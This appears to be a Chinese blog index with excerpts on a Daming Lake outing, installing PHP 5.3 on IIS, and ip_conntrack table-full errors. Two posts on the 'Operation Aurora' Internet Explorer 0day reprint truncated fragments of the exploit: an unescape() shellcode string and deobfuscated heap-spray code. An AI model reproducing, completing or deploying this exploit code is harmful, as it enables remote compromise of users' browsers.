天行健,君子以自强不息;
      地势坤,君子以厚德载物;

预览模式: 普通 | 列表

春游大明湖

今日去济南办事,地点正好在大明湖畔,趁中午休憩时间,大略浏览了一下大明湖概貌,算是春季踏青吧。

 

windows server 2003 IIS上安装 PHP 5.3

由于PHP5.3的全新特效及改进,原有的isapi方式解析PHP脚本已经不被支持,PHP从5.3.0以后的版本开始使用微软的fastcgi模式,这是一个更先进的方式,运行速度更快,更稳定!


新版本的PHP5.3通过以往老方法已经不能在IIS上安装了,现在给出在IIS上安装PHP5.3以后版本的教程。


首先下载并安装IIS FastCGI,下载地址http://www.iis.net/1521/ItemPermalink.ashx


下载IIS下的PHP,下载地址http://windows.php.net/download/,(注意IIS下要选择VC9的版本)解压到所需目录,该目录需要给予user读取

[阅读全文]

标签: 转载 Windows PHP

关于ip_conntrack: table full, dropping packet的问题

有一下载系统,近期系统报日志:
Jan 25 09:22:50 MOV-219-146-145-244 kernel: printk: 1477 messages suppressed.
Jan 25 09:22:50 MOV-219-146-145-244 kernel: ip_conntrack: table full, dropping packet.
Jan 25 09:22:55 MOV-219-146-145-244 kernel: printk: 1360 messages suppressed.
Jan 25 09:22:55 MOV-219-146-145-244 kerne

[阅读全文]

传说中的IE 0day

影响IE6-IE8全系列,传说中Google“被入侵”所用到的那份。

<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3

[阅读全文]

极光行动:攻击Google的代码曝光

TechWeb旗下的DarkReading发表文章,透露iDefense已经收回之前发布的Adobe PDF漏洞导致Google被攻击的声明,承认McAfee所说的IE漏洞才是祸源。

文章还给出了一个链接,指向开源渗透测试工具项目Metasploit的博客,上面给出了利用这个IE漏洞的攻击代码链接。代码如下:

【去混淆后的代码】


Evals

  • varn=unescape("%u0c0d%u0c0d");while(n.length=524288)n+=n;n=n.substring(0,524269-sc.length);varx=newArray();for(vari=0;i200

[阅读全文]